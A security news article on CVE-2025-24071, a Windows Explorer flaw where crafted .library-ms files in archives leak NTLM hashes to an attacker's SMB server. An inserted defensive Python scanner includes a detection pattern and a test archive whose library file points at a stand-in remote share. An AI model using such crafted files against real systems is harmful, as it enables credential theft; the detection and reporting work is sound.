Windows NTLM File Explorer Vulnerability Exploited in the Wild – PoC Exploit Released

A critical vulnerability in Windows File Explorer, identified as CVE-2025-24071, has been discovered and is being actively exploited in the wild.

This vulnerability allows attackers to capture NTLM hashes, potentially leading to network spoofing attacks.

The exploit involves specially crafted .library-ms files embedded within compressed archives like RAR or ZIP.

When these files are extracted, Windows Explorer automatically processes them, initiating an NTLM authentication handshake with an attacker-controlled SMB server without requiring user interaction.

https://twitter.com/0x6rss/status/1901958026669502721

Technical Explanation of NTLM Hash Leak

The .library-ms file format is XML-based and is trusted by Windows Explorer to define search and library locations.

When a specially crafted .library-ms file containing an SMB path is extracted from a compressed archive, Windows Explorer attempts to resolve this path automatically to gather metadata and index file information.

This action triggers an implicit NTLM authentication handshake from the victim’s system to the attacker-controlled SMB server, leaking the victim’s NTLMv2 hash without explicit user interaction.

The vulnerability exploits Windows Explorer’s automatic file processing mechanism, which occurs even if the user never explicitly opens the extracted file.
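As an added defensive example (not code from the original article, and not the GitHub PoC it mentions), the following Python scanner opens a ZIP archive, inspects every .library-ms member and flags any whose location points at a remote UNC or SMB host rather than a local folder, which is exactly the pattern described above. It assumes the location lives in a `<url>` element of the Library Description XML (matched by local name, so the namespace does not matter); the sample archive, its file names and the 192.0.2.10 documentation-range address are constructed test fixtures.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Union

# A location is "remote" if it is a UNC path (\\host\share), an smb:// URL, or a
# file:// URL with a host component. \\?\ and \\.\ device-path prefixes are excluded.
REMOTE_LOCATION = re.compile(r"^(\\\\[^\\?.][^\\]*|smb://|file://[^/])", re.IGNORECASE)


def remote_urls_in_library(xml_doc: Union[bytes, str]) -> List[str]:
    """Return every <url> value in a .library-ms document that references a remote host."""
    if isinstance(xml_doc, str):
        xml_doc = xml_doc.encode("utf-8")
    try:
        root = ET.fromstring(xml_doc)
    except ET.ParseError:
        # Not well-formed XML: nothing Explorer would resolve, nothing to flag.
        return []
    hits = []
    for elem in root.iter():
        # '{namespace}url' -> 'url'; element name assumed from the Library Description schema.
        if elem.tag.rsplit("}", 1)[-1].lower() == "url" and elem.text:
            value = elem.text.strip()
            if REMOTE_LOCATION.match(value):
                hits.append(value)
    return hits


def scan_archive(zip_bytes: bytes) -> Dict[str, List[str]]:
    """Map each .library-ms member of a ZIP archive to the remote locations it references."""
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            urls = remote_urls_in_library(zf.read(info))
            if urls:
                findings[info.filename] = urls
    return findings


# Constructed fixture: minimal library description with a single location.
LIBRARY_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_sample_archive() -> bytes:
    """Build an in-memory ZIP with one benign and one suspicious .library-ms member (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Pictures.library-ms", LIBRARY_TEMPLATE.format(url=r"C:\Users\Public\Pictures"))
        zf.writestr("Documents.library-ms", LIBRARY_TEMPLATE.format(url=r"\\192.0.2.10\share"))
        zf.writestr("readme.txt", "not a library file")
    return buf.getvalue()


if __name__ == "__main__":
    for member, urls in scan_archive(build_sample_archive()).items():
        print(f"SUSPICIOUS {member}: references remote location(s) {urls}")
```

The scanner is meant to run where archives are handled before a user extracts them, such as a mail gateway or an endpoint quarantine step; RAR archives need a third-party reader and are not covered here. Scanning complements, rather than replaces, the patch and host controls such as blocking outbound TCP 445 at the perimeter and the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, which stop the authentication attempt itself even if a file slips through.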

Exploitation

Exploitation of CVE-2025-24071 has been facilitated by the exploit being offered for sale on dark web forums, and a threat actor known as “Krypt0n” has been linked to its use.

(Image: dark web forum post offering the exploit)

This actor has developed malware called “EncryptHub Stealer,” further emphasizing the urgency of patching affected systems.

Microsoft addressed this vulnerability in its March Patch Tuesday update, and users are advised to ensure their Windows systems are updated with the latest security patches to prevent exploitation.

A Proof of Concept (PoC) for CVE-2025-24071 has been released on GitHub, demonstrating how attackers can exploit this vulnerability using a Python script.

The script generates a malicious .library-ms file and embeds it within a RAR or ZIP archive, requiring minimal input such as the target file name and the attacker’s IP address.

The vulnerability’s potential for exploitation underscores the importance of keeping Windows systems updated and implementing additional protections against NTLM relay attacks.

Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
